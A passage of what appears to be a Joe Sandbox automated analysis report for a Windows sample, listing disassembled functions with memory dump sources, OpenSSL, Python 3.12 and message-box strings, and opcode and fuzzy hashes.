                                                                                                                                                                                                                            • Source File: 00000001.00000002.1877092897.00007FFDFF241000.00000020.00000001.01000000.00000013.sdmp, Offset: 00007FFDFF240000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877067967.00007FFDFF240000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877092897.00007FFDFF2C3000.00000020.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877173635.00007FFDFF2C5000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877203803.00007FFDFF2ED000.00000008.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877227349.00007FFDFF2F1000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF2F2000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF2F8000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF300000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdff240000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: R_newR_set_debug
                                                                                                                                                                                                                            • String ID: ..\s\ssl\statem\extensions_clnt.c$tls_construct_ctos_alpn
                                                                                                                                                                                                                            • API String ID: 193678381-4282401781
                                                                                                                                                                                                                            • Opcode ID: 1f74c8e94b485edefa14d9c83d6de6a7f2a170bd93a411e68520797306d91e77
                                                                                                                                                                                                                            • Instruction ID: 8c5d30f8a439e7daf496043c49bdb955a4f8b46b5b719db1d9a30e060293e8a9
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1f74c8e94b485edefa14d9c83d6de6a7f2a170bd93a411e68520797306d91e77
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6F21AF51B0858241F7609656E569FBA1390EF457C8F181230DE3DCBADADF6DD5828710
                                                                                                                                                                                                                            Function 00007FFDFF241CC1 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 62COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1877092897.00007FFDFF241000.00000020.00000001.01000000.00000013.sdmp, Offset: 00007FFDFF240000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877067967.00007FFDFF240000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877092897.00007FFDFF2C3000.00000020.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877173635.00007FFDFF2C5000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877203803.00007FFDFF2ED000.00000008.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877227349.00007FFDFF2F1000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF2F2000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF2F8000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF300000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdff240000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: R_newR_set_debug
                                                                                                                                                                                                                            • String ID: ..\s\ssl\statem\extensions_srvr.c$tls_construct_stoc_etm
                                                                                                                                                                                                                            • API String ID: 193678381-2359301497
                                                                                                                                                                                                                            • Opcode ID: fadffb2917693f2f04d81bcd8fe93670a899bdb0f3ddd29a04072c7e06c19dfb
                                                                                                                                                                                                                            • Instruction ID: a4164067efaa1f4162e96e2c27fed7a8bab3c4fde70fb6133c095b597d797c33
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: fadffb2917693f2f04d81bcd8fe93670a899bdb0f3ddd29a04072c7e06c19dfb
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: FD21C351B1800286F774CB06E574BBE2390DB447DCF580230DA3DCB6DADE2DD8819704
                                                                                                                                                                                                                            Function 00007FFDFF27EFC0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 55COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1877092897.00007FFDFF241000.00000020.00000001.01000000.00000013.sdmp, Offset: 00007FFDFF240000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877067967.00007FFDFF240000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877092897.00007FFDFF2C3000.00000020.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877173635.00007FFDFF2C5000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877203803.00007FFDFF2ED000.00000008.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877227349.00007FFDFF2F1000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF2F2000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF2F8000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF300000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdff240000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: O_indentO_printf
                                                                                                                                                                                                                            • String ID: %s=0x%x (%s)$UNKNOWN
                                                                                                                                                                                                                            • API String ID: 1860387303-4219816433
                                                                                                                                                                                                                            • Opcode ID: 3028389455207f4400ca3fab79cf2094c72d0b6b32480db97ca3597aae6de28d
                                                                                                                                                                                                                            • Instruction ID: f8cb7ea538cdeace1aaa029cbfa678de90d829ae60ca7bf66427194641c9c4fa
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3028389455207f4400ca3fab79cf2094c72d0b6b32480db97ca3597aae6de28d
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 70214D32B08B9185D7248F16E46096977A0FB89B90F444235EBFDC7BD9DE3CE5518B00
                                                                                                                                                                                                                            Function 00007FFDFF2B9D40 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 55COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1877092897.00007FFDFF241000.00000020.00000001.01000000.00000013.sdmp, Offset: 00007FFDFF240000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877067967.00007FFDFF240000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877092897.00007FFDFF2C3000.00000020.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877173635.00007FFDFF2C5000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877203803.00007FFDFF2ED000.00000008.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877227349.00007FFDFF2F1000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF2F2000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF2F8000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF300000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdff240000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: R_newR_set_debug
                                                                                                                                                                                                                            • String ID: ..\s\ssl\statem\statem_srvr.c$tls_handle_status_request
                                                                                                                                                                                                                            • API String ID: 193678381-662828239
                                                                                                                                                                                                                            • Opcode ID: 128a7ac4e5730906a20882eb69817aa0aeaa0437cbf13b301e390fda9a1e28bb
                                                                                                                                                                                                                            • Instruction ID: d85554e585a4c2a3b1724b5fccb3542518b35bdbf7017b8aff05edfb0041799e
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 128a7ac4e5730906a20882eb69817aa0aeaa0437cbf13b301e390fda9a1e28bb
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3821DF22B0564289FB549F56E468BB83390EB81B14F4C9235CE7CCA3DADF2C9581CB00
                                                                                                                                                                                                                            Function 00007FFDFF24DE63 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 52COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1877092897.00007FFDFF241000.00000020.00000001.01000000.00000013.sdmp, Offset: 00007FFDFF240000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877067967.00007FFDFF240000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877092897.00007FFDFF2C3000.00000020.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877173635.00007FFDFF2C5000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877203803.00007FFDFF2ED000.00000008.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877227349.00007FFDFF2F1000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF2F2000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF2F8000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF300000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdff240000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: R_newR_set_debug
                                                                                                                                                                                                                            • String ID: ..\s\ssl\s3_lib.c$ssl3_ctx_ctrl
                                                                                                                                                                                                                            • API String ID: 193678381-780421027
                                                                                                                                                                                                                            • Opcode ID: 19c2a0fa7603b50d19c5e3d664a25978ee8d6031513b7addd96108387032f82c
                                                                                                                                                                                                                            • Instruction ID: 1fa8c698b4656f918df1e4f57ad7f50565e33cb8f0aa6043b55aedde38d58fcc
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 19c2a0fa7603b50d19c5e3d664a25978ee8d6031513b7addd96108387032f82c
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9121FC13E28FC583E7418B28D6512B86320F7A9748F49A321DFAC56297EF68F6D4C710
                                                                                                                                                                                                                            Function 00007FFDFF241E65 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 48COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1877092897.00007FFDFF241000.00000020.00000001.01000000.00000013.sdmp, Offset: 00007FFDFF240000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877067967.00007FFDFF240000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877092897.00007FFDFF2C3000.00000020.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877173635.00007FFDFF2C5000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877203803.00007FFDFF2ED000.00000008.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877227349.00007FFDFF2F1000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF2F2000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF2F8000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF300000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdff240000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID: ..\s\ssl\statem\extensions_clnt.c$tls_construct_ctos_etm
                                                                                                                                                                                                                            • API String ID: 0-2790762957
                                                                                                                                                                                                                            • Opcode ID: 929e666fa879019df2f35551bfc0533c41de5de56a5113323e8c349a402d9633
                                                                                                                                                                                                                            • Instruction ID: bc22fc8990a821c21df93a9d0c50b07bf1b226f06fcb420bab298b118a9174b2
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 929e666fa879019df2f35551bfc0533c41de5de56a5113323e8c349a402d9633
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5F016D11B1814242F7549226E966FBA5340AB89788F881230ED7DCBBCBDEAEE5815B00
                                                                                                                                                                                                                            Function 00007FFDFF24201D Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 47COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1877092897.00007FFDFF241000.00000020.00000001.01000000.00000013.sdmp, Offset: 00007FFDFF240000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877067967.00007FFDFF240000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877092897.00007FFDFF2C3000.00000020.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877173635.00007FFDFF2C5000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877203803.00007FFDFF2ED000.00000008.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877227349.00007FFDFF2F1000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF2F2000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF2F8000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF300000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdff240000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: R_newR_set_debug
                                                                                                                                                                                                                            • String ID: ..\s\ssl\statem\statem_clnt.c$tls_process_hello_req
                                                                                                                                                                                                                            • API String ID: 193678381-485657334
                                                                                                                                                                                                                            • Opcode ID: d93eec9902d2f5d23f23c2522f45d4aa4370754e0a636d1c31099cc03383fe41
                                                                                                                                                                                                                            • Instruction ID: 59087a611c2358322c1e4ba28310b7ee8fb7a6a18f14980329cb6506ea9c29a5
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d93eec9902d2f5d23f23c2522f45d4aa4370754e0a636d1c31099cc03383fe41
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: EC0180A2F1518243F705A766D422BF81750EF81744F984270D93CCB7CBDEAEAAD28B04
                                                                                                                                                                                                                            Function 00007FF602992870 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 44windowCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1875006833.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1874987275.00007FF602990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875032378.00007FF6029BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875052495.00007FF6029CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875052495.00007FF6029D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875084625.00007FF6029D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff602990000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Message$ByteCharMultiWide
                                                                                                                                                                                                                            • String ID: Error/warning (ANSI fallback)$Warning
                                                                                                                                                                                                                            • API String ID: 1878133881-2698358428
                                                                                                                                                                                                                            • Opcode ID: 78b83146050a42d288f23809762ffa169c69ffbcb83a56659e04ce7da0b4556a
                                                                                                                                                                                                                            • Instruction ID: 22d22f37dbf95b4db568b86249e3aa30ac7604e8e759ffc7ab027187fc3aebda
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 78b83146050a42d288f23809762ffa169c69ffbcb83a56659e04ce7da0b4556a
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7311C172A28B8191FB20CB06F551BA93764FF44B8CFA05135DA8C87646DFBCD615C740
                                                                                                                                                                                                                            Function 00007FF6029925F0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 44windowCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1875006833.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1874987275.00007FF602990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875032378.00007FF6029BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875052495.00007FF6029CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875052495.00007FF6029D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875084625.00007FF6029D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff602990000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Message$ByteCharMultiWide
                                                                                                                                                                                                                            • String ID: Error$Error/warning (ANSI fallback)
                                                                                                                                                                                                                            • API String ID: 1878133881-653037927
                                                                                                                                                                                                                            • Opcode ID: 3f244dd2de3b921acfe38b69a8ed211b74921365d3241a070afb051abf77115f
                                                                                                                                                                                                                            • Instruction ID: 0d039d64eb68528d8131f0544d4a5d9092e89a71725f72e221903d3c00bc3437
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3f244dd2de3b921acfe38b69a8ed211b74921365d3241a070afb051abf77115f
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D811C172A28B8191FB20CB06F851BA93764FF44B8CFA05136EA8C87646DFBCD615C700
                                                                                                                                                                                                                            Function 00007FFDFABD1ED0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 42COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • PyErr_SetString.PYTHON312(?,?,?,?,?,00007FFDFABD1EBC), ref: 00007FFDFABD3C1F
                                                                                                                                                                                                                              • Part of subcall function 00007FFDFABD1FB0: strncmp.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFDFABD1FE8
                                                                                                                                                                                                                              • Part of subcall function 00007FFDFABD1FB0: strncmp.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFDFABD2006
                                                                                                                                                                                                                            • PyErr_Format.PYTHON312 ref: 00007FFDFABD1F33
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1875123056.00007FFDFABD1000.00000020.00000001.01000000.00000019.sdmp, Offset: 00007FFDFABD0000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875105491.00007FFDFABD0000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875139625.00007FFDFABD5000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875139625.00007FFDFAC32000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875139625.00007FFDFAC7E000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875139625.00007FFDFAC82000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875139625.00007FFDFAC87000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875139625.00007FFDFACDF000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875292663.00007FFDFACE2000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875308130.00007FFDFACE4000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdfabd0000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Err_strncmp$FormatString
                                                                                                                                                                                                                            • String ID: name too long$undefined character name '%s'
                                                                                                                                                                                                                            • API String ID: 3882229318-4056717002
                                                                                                                                                                                                                            • Opcode ID: 1035d3c545dcad7f3fc1fcdb04c9696ab0948ab795443172b9eb40205ee2c5c7
                                                                                                                                                                                                                            • Instruction ID: d856c51e88e66be0cf1b25908a4ace1d9f2f5ac95ddd18c647a5f88898ac00bd
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1035d3c545dcad7f3fc1fcdb04c9696ab0948ab795443172b9eb40205ee2c5c7
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: AA115276B1C947C1EB088B14E8A4AB86364FB98749FC405B1CE2E472E8DF7DE14AC740
                                                                                                                                                                                                                            Function 00007FFDFF241D39 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 41COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1877092897.00007FFDFF241000.00000020.00000001.01000000.00000013.sdmp, Offset: 00007FFDFF240000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877067967.00007FFDFF240000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877092897.00007FFDFF2C3000.00000020.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877173635.00007FFDFF2C5000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877203803.00007FFDFF2ED000.00000008.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877227349.00007FFDFF2F1000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF2F2000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF2F8000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF300000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdff240000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: R_newR_set_debug
                                                                                                                                                                                                                            • String ID: ..\s\ssl\statem\statem_srvr.c$tls_construct_cert_status_body
                                                                                                                                                                                                                            • API String ID: 193678381-3528029177
                                                                                                                                                                                                                            • Opcode ID: 56c19cf95176afaa6b29a4f613b490a0cbc56ba77d087dbd92099a33152c2075
                                                                                                                                                                                                                            • Instruction ID: da19bf1400e7e1b04ea23322e9ff96bab140c4f92caa58b9c51cdb7294b7fae8
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 56c19cf95176afaa6b29a4f613b490a0cbc56ba77d087dbd92099a33152c2075
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3C015A11B08A8285E750A722E961FF95750AF49BC4F884131EE7DCBBCFDE6DE6818700
                                                                                                                                                                                                                            Function 00007FFDFF27E000 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 38COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1877092897.00007FFDFF241000.00000020.00000001.01000000.00000013.sdmp, Offset: 00007FFDFF240000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877067967.00007FFDFF240000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877092897.00007FFDFF2C3000.00000020.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877173635.00007FFDFF2C5000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877203803.00007FFDFF2ED000.00000008.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877227349.00007FFDFF2F1000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF2F2000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF2F8000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF300000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdff240000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: O_printf
                                                                                                                                                                                                                            • String ID: %02X$%s (len=%d):
                                                                                                                                                                                                                            • API String ID: 601296420-4138326432
                                                                                                                                                                                                                            • Opcode ID: 34f14257eea81417c4dcef0e5f015586ed8507b8eb49392f2d3d7cf2aaba7c7d
                                                                                                                                                                                                                            • Instruction ID: 7f230b9fa2f5681ef63c8de7a2debf63b666b8145e9a67e7ad633184a7cc832c
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 34f14257eea81417c4dcef0e5f015586ed8507b8eb49392f2d3d7cf2aaba7c7d
